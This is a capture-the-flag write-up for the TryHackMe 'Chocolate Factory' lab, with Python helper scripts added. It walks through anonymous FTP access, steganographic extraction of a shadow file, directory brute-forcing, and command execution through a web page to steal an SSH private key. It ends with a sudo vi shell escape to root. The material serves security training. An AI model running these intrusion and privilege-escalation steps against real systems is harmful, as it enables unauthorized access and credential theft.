TryHackMe Chocolate Factory WriteUp
Hello and welcome to my first writeup!

Reconnaissance and Enumeration
First we scan the machine with nmap, using -sV so it also tries to identify the service and version behind each open port:
```
nmap -sV [IP HERE]
```
nmap scan result:
```
21/tcp  open ftp     vsftpd 3.0.3
22/tcp  open ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open http    Apache httpd 2.4.29 ((Ubuntu))
100/tcp open newacct?
106/tcp open pop3pw?
109/tcp open pop2?
110/tcp open pop3?
111/tcp open rpcbind?
113/tcp open ident?
119/tcp open nntp?
125/tcp open locus-map?
```
A trailing "?" means nmap saw the port open but could not match the response to any known service banner. Ports 100 to 125 deserve a quick manual look with nc, but the identified services (FTP, SSH and HTTP) are where the enumeration below goes.
ftp enumeration
We log in to FTP with username "anonymous" and password "anonymous". Anonymous login being enabled is a finding in itself: vsftpd 3.0.3 allows it here by configuration, not because of a bug.
In the FTP share we find "gum_room.jpg". After downloading it, we check it for hidden data with steghide:
```
steghide extract -sf gum_room.jpg
```
I pressed Enter at the passphrase prompt (empty passphrase) and steghide extracted b64.txt.
Base64-decoding its contents gives what looks like an /etc/shadow file. I didn't find anything useful in it; the password hashes it holds would have to be cracked offline before they are of any use.
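As an added example (my own Python, not part of the original writeup), here is the triage I did by hand for b64.txt as a script: base64-decode the extracted text, parse it as /etc/shadow, and report for each account whether its hash is crackable and which hashcat mode applies. The shadow lines are constructed sample data with fake hashes, not the box's file.

```python
import base64

# Constructed sample: shadow-style lines as they might appear after decoding b64.txt.
# Fake accounts and fake hash bodies; only the crypt(3) id prefixes are realistic.
SAMPLE_SHADOW = """\
root:$6$saltsalt$fakesha512hashvalueXXXXXXXXXXXXXXXXXXXXXX:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
charlie:$1$abcdefgh$fakemd5cryptvalue:18000:0:99999:7:::
guest::18000:0:99999:7:::
"""
# What b64.txt would look like for that content (built here so the decode step is exercised).
SAMPLE_B64 = base64.b64encode(SAMPLE_SHADOW.encode()).decode()

# crypt(3) id -> (algorithm, hashcat mode); yescrypt has no hashcat mode, use john --format=crypt
HASH_TYPES = {
    "1": ("md5crypt", "500"),
    "2a": ("bcrypt", "3200"),
    "2b": ("bcrypt", "3200"),
    "2y": ("bcrypt", "3200"),
    "5": ("sha256crypt", "7400"),
    "6": ("sha512crypt", "1800"),
    "y": ("yescrypt", None),
}


def classify_hash(field):
    """Describe the second field of a shadow line."""
    if field == "":
        return "empty: account has no password"
    if field[0] in "!*":
        return "locked: no usable password"
    if field.startswith("$"):
        crypt_id = field.split("$")[1]          # "$6$salt$hash" -> "6"
        algo, mode = HASH_TYPES.get(crypt_id, ("unknown $%s$" % crypt_id, None))
        return algo if mode is None else "%s (hashcat -m %s)" % (algo, mode)
    return "unrecognised format (legacy DES crypt or corrupt?)"


def parse_shadow(text):
    """Parse shadow-format text into a list of {user, hash, kind} dicts."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue                            # not a shadow line; skip rather than crash
        entries.append({"user": fields[0], "hash": fields[1], "kind": classify_hash(fields[1])})
    return entries


def crackable(entries):
    """Users whose hash can be handed to hashcat or john."""
    return [e["user"] for e in entries if e["hash"].startswith("$")]


def triage_b64(b64_text):
    """Decode base64 (stray newlines are ignored by b64decode) and triage the result."""
    text = base64.b64decode(b64_text).decode("utf-8", errors="replace")
    return parse_shadow(text)


if __name__ == "__main__":
    for e in triage_b64(SAMPLE_B64):
        print(f"{e['user']:10} {e['kind']}")
```

On a real engagement the crackable users list is what goes into hashcat together with the matching mode; an empty second field is worth more than any hash, since it means the account logs in without a password.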
web enumeration
We open the web page and find a login portal.
I used gobuster to enumerate directories and files:
```
gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html
```
gobuster: the tool.
dir: directory/file brute-force mode.
-u: the target URL.
-w: the wordlist to try.
-x: also request each word with these extensions (.php, .txt and .html), so files are found as well as directories.
result:
```
/.php         (Status: 403) [Size: 278]
/.html        (Status: 403) [Size: 278]
/index.html   (Status: 200) [Size: 1466]
/home.php     (Status: 200) [Size: 569]
/validate.php (Status: 200) [Size: 93]
```
The 403s for /.php and /.html are not readable resources. The pages worth looking at are home.php and validate.php; the latter answering with only 93 bytes suggests a small script, which is a reason to read its source once we have access to the box.
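To show what gobuster is doing under the hood, the following added Python example (my own code, not from the writeup or the gobuster project) brute-forces a wordlist crossed with extensions against a target and reports status and body size the way gobuster does. Because it has to run offline, it starts a fake target on localhost whose paths mirror the results above; the wordlist is a constructed stub standing in for directory-list-2.3-medium.txt.

```python
import http.server
import socketserver
import threading
import urllib.error
import urllib.request

# Constructed stand-in for directory-list-2.3-medium.txt. The empty word reproduces
# the bare-extension probes (/.php, /.html) seen in the gobuster output.
WORDLIST = ["", "index", "home", "validate", "admin", "uploads"]
EXTENSIONS = ["", ".php", ".txt", ".html"]   # "" = the word on its own

# Constructed fake target whose paths mirror the gobuster results above.
FAKE_SITE = {
    "/.php": (403, b"<h1>Forbidden</h1>"),
    "/.html": (403, b"<h1>Forbidden</h1>"),
    "/index.html": (200, b"<html><body>login portal</body></html>"),
    "/home.php": (200, b"<html><body>command runner</body></html>"),
    "/validate.php": (200, b"<html>login check</html>"),
}


class FakeHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        status, body = FAKE_SITE.get(self.path, (404, b"Not Found"))
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):      # keep the demo output clean
        pass


def start_fake_site():
    """Serve FAKE_SITE on a random loopback port; returns (server, base_url)."""
    server = socketserver.TCPServer(("127.0.0.1", 0), FakeHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


# Ignore any HTTP_PROXY in the environment so loopback requests go direct.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def probe(url, timeout=5):
    """Return (status, body_size); an HTTP error status is an answer, not a failure."""
    try:
        with OPENER.open(url, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def brute_dirs(base_url, words, extensions, ignore=(404,)):
    """gobuster 'dir -x' loop: every word with every extension, dropping ignored statuses."""
    hits = []
    for word in words:
        for ext in extensions:
            path = "/" + word + ext
            if path == "/":
                continue                # the site root is not a brute-force result
            status, size = probe(base_url + path)
            if status not in ignore:
                hits.append((path, status, size))
    return hits


def run_demo():
    server, base_url = start_fake_site()
    try:
        return brute_dirs(base_url, WORDLIST, EXTENSIONS)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for path, status, size in run_demo():
        print(f"{path} (Status: {status}) [Size: {size}]")
```

The size column matters as much as the status: a server that answers 200 for everything shows up as a wall of identical sizes, which is the cue to switch to size- or word-count based filtering instead of status-based filtering.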
Initial Access:
Navigating to home.php, we find a page that runs shell commands for us.
We try the whoami command.
It works! We look for users in the home directory with "ls /home".
We find the user charlie and list his files with "ls /home/charlie". One of them is named teleport:
```
cat /home/charlie/teleport
```
Bingo! It is an SSH private key.
I copied it into a file named id_rsa and gave it the permissions ssh insists on (ssh refuses a key that is group- or world-readable):
```
chmod 600 id_rsa
ssh -i id_rsa charlie@[IP HERE]
```
We test whether the key lets us log in over SSH as charlie, whose home directory it came from. The key works!
In /var/www/html I found a file named key_rev_key and tried to run it:
I made it executable with chmod +x key_rev_key.
Since it is a binary, the key it holds can also be read straight out of it with strings key_rev_key.
Got the key!
```
b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
```
Keep it: it is 44 characters of URL-safe base64, the format of a Python Fernet key, and it is needed again later.
Also in /var/www/html, we cat validate.php: the login check has charlie's password hardcoded in it, so reading the source gives us the password :)
Switch to charlie's account with "su charlie" and read user.txt.
Privilege Escalation:
The first thing to check is sudo -l, which lists what charlie may run through sudo. Result:
```
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
```
Read the rule carefully. In a sudoers runas spec, the part before the colon is the list of users we may run as and the part after it is the list of groups. (ALL : !root) therefore lets charlie run vi as any user, root included, without a password; only the root group is excluded, which does not stop a plain sudo vi from running as root.
GTFOBins lists a shell escape for vi: vi -c ':!/bin/sh' /dev/null.
Run it under sudo; since the rule allows vi to run as root, the shell it spawns is root's:
```
charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null
```
pwned!!
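As an added example (my own Python, not from the writeup), here is a small parser for sudo -l output that splits each rule into its runas user list, runas group list, tags and commands, and picks out the NOPASSWD rules that both admit root and involve a binary with a known shell escape, which is the check I did by eye above. The sample is the writeup's output plus two constructed rules for contrast; the shell-escape set is an illustrative subset I chose, not the full GTFOBins list.

```python
import re

# Constructed sample: the writeup's sudo -l output plus two made-up rules for contrast.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: /usr/bin/less, /usr/bin/find
"""

# Binaries whose GTFOBins sudo entry is a shell escape (illustrative subset, my assumption).
SHELL_ESCAPES = {"vi", "vim", "nano", "less", "more", "find", "awk", "perl",
                 "python", "python3", "bash", "sh"}

# (runas_users[ : runas_groups]) [TAG: ...] command[, command...]
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def allows_root(user_list):
    """True if the runas *user* list admits root. Only a '!root' before the colon denies it;
    a '!root' in the group list (after the colon) does not."""
    users = [u.strip() for u in user_list.split(",")]
    if "!root" in users or "!ALL" in users:
        return False
    return any(u in ("ALL", "root") for u in users)


def parse_sudo_l(text):
    """Parse the 'may run the following commands' section of sudo -l into one dict per command."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules and line else None
        if not m:
            continue
        runas = [p.strip() for p in m.group("runas").split(":")]
        run_users = runas[0]
        run_groups = runas[1] if len(runas) > 1 else None
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        # Assumes no command argument contains a comma; rare in practice.
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            rules.append({
                "run_as_users": run_users,
                "run_as_groups": run_groups,
                "nopasswd": "NOPASSWD" in tags,
                "allows_root": allows_root(run_users),
                "command": cmd,
                "binary": binary,
                "shell_escape": binary in SHELL_ESCAPES,
            })
    return rules


def quick_wins(rules):
    """Commands that give a root shell with no password: the ones to try first."""
    return [r["command"] for r in rules
            if r["nopasswd"] and r["allows_root"] and r["shell_escape"]]


if __name__ == "__main__":
    parsed = parse_sudo_l(SAMPLE_SUDO_L)
    for r in parsed:
        print(f"{r['command']:40} users={r['run_as_users']} groups={r['run_as_groups']} "
              f"nopasswd={r['nopasswd']} root={r['allows_root']} escape={r['shell_escape']}")
    print("try first:", quick_wins(parsed))
```

The writeup's rule comes out as run_as_users ALL with run_as_groups !root, so allows_root is true; had the rule been written (ALL, !root) the negation would sit in the user list and the parser would report it as not admitting root.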
Finding the root flag
We find root.py. Run it, enter the key obtained from key_rev_key when it asks for one, and it prints the root flag.
Happy Pwning :)